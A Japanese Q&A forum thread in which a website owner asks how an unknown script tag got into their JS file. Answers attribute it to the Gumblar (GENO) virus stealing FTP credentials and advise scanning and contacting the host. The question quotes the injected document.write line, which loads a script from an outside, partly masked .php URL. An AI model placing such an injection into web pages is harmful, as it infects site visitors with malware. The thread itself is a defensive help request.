アプリ版:「スタンプのみでお礼する」機能のリリースについて

レンタルサーバーで、ホームページを運営しております。本日突然表示がおかしくなり、Webサーバー内のファイルを調べたところ、jsファイルに追加した覚えのない記述が見つかりました。以下のような変なサイトのphpファイルのURLも記述されています。
document.write('<script src=http://**.se/bilder/klassfest3.php ><\/script>');
このような記述はしていませんし、サーバーにアップロード前のjsファイルと比べてもこのような記述はありません。
何者かがファイルを書き換えることなんて出来るのでしょうか?
防衛策なんてあるのでしょうか?
あまり知識の無いものがHPの運営をしているのが問題かもしれませんが、今後のことを思うと心配です。

A 回答 (2件)

詳しい者ではありませんが、

レンタルサーバー側がクラックされたか、もしくはあなたのPC(もしくはネットワーク内のどれかのPC)が
Gumblar(別名GENOウイルス)に感染している可能性があると思われます。
Gumblarウイルスに感染した場合、アップロードするためのFTPのIDとパスワードが攻撃者に盗まれるので悪用される事があります。
実際、そのサイトに行くとGumblarウイルス(Trojan-Downloader.JS.Gumblar.x)がダウンロードされる仕組みになっています。
もちろんウイルスに感染していると断言することはできませんが、
念のためウイルスをスキャンすることをオススメします。
    • 0
この回答へのお礼

ご回答ありがとうございます。
確かに1台のパソコンの調子が悪いです。
ウィルススキャンを実施します。
レンタルサーバー業者にもその旨を伝えます。
ありがとうございました。

侵入経路はわかりませんがクラックされてますね。

今後の対応策としては、「セキュリティホール」と呼ばれる「裏口(侵入口)」をふさいでいくしかないのですが、まぁ一言じゃ説明できませんのでレンタルサーバ業者に相談することをおすすめします

この回答への補足

セキュリティホールは、レンタルサーバー側ということでしょうか?それとも私のサイトのフォルダの中ということなのでしょうか?

• 0
この回答へのお礼

早速のご回答ありがとうございます。
まずはレンタルサーバー業者に当たってみます。